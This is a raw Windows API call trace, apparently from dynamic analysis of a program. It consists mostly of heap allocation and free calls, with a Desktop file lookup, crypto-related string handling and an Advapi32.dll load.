[0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0215.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0215.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0215.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0215.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0215.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0215.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0215.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0215.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0215.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0215.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.577] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0215.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0215.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0215.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0215.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0215.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0215.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0215.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0215.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0215.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0215.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0215.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0215.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0215.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0215.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0215.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0215.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0215.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0215.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0215.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0215.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0215.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0215.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0215.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0215.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0215.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0215.579] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0215.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0215.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0215.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0215.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0215.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0215.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0215.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0215.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0215.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0215.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0215.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0215.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.581] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0215.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0215.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0215.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0215.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0215.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0215.581] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/ZsyajCuqv92xTr5whyk.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e2731f0, ftCreationTime.dwHighDateTime=0x1d5eec8, ftLastAccessTime.dwLowDateTime=0xe4508660, ftLastAccessTime.dwHighDateTime=0x1d5ed65, ftLastWriteTime.dwLowDateTime=0xe4508660, ftLastWriteTime.dwHighDateTime=0x1d5ed65, nFileSizeHigh=0x0, nFileSizeLow=0x21a2, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="ZsyajCuqv92xTr5whyk.bmp", cAlternateFileName="ZSYAJC~1.BMP")) returned 0xa87610 [0215.582] FindClose (in: hFindFile=0xa87610 | out: hFindFile=0xa87610) returned 1 [0215.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0215.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0215.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0215.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0215.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0215.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0215.582] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0215.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0215.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0215.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0215.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0215.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0215.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0215.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0215.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0215.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0215.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0215.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0215.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0215.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0215.583] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0215.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0215.583] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0215.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0215.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0215.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0215.583] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0215.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0215.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0215.583] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0215.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0215.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0215.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0215.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0215.583] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0215.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0215.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0215.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0215.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0215.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0215.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0215.584] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0215.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0215.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0215.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0215.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0215.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0215.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0215.585] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0215.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0215.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0215.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0215.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0215.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0215.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0215.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0215.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.586] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0215.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.586] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0215.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0215.586] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0215.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0215.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0215.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0215.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0215.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0215.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0215.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0215.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0215.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0215.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0215.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0215.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0215.587] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0215.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0215.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0215.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.587] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0215.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0215.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0215.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0215.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0215.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0215.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0215.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0215.588] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0215.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 